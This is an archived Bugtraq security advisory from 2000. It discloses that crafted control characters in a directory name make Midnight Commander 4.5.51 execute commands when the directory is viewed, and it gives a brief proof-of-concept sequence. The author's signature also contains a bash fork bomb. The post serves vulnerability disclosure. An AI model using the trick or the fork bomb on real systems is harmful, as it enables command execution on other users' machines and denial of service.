5791485 2000-11-28 01:15 +0100  /33 rader/ Michal Zalewski <lcamtuf@TPI.PL>
Sänt av: joel@lysator.liu.se
Importerad: 2000-11-28  21:49  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: lcamtuf@TPI.PL
Mottagare: Bugtraq (import) <13938>
Ärende: Midnight Commander
------------------------------------------------------------
From: Michal Zalewski <lcamtuf@TPI.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.10.10011280100360.925-100000@localhost>

The Midnight Commander 4.5.51 (latest).

$ od -t x1 mcbug
0000000 03 14 77 04 0a
$ mkdir `cat mcbug`
$ mc

(try to view this directory - 'w' - 0x77 command will be executed;
longer commands might be used, as well)

Obviously, this attack requires privledged user interaction. Midnight
Commander won't display full name of the directory if it's long
enough, so these control characters can be easily hidden.

Such problems in Midnight Commander seems to appear less or more
frequently. I am affraid this pretty useful file manager should not be
used in multiuser systems, especially by root (I can recall numerous
problems with this utility last years - code execution when viewing
specific file types, code execution via mc vfs support, etc etc) :(

Workaround: well, I am affraid only code audit might help :(

--
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=--=> Did you know that clones never use mirrors? <=--=
(5791485) --------------------------------(Ombruten)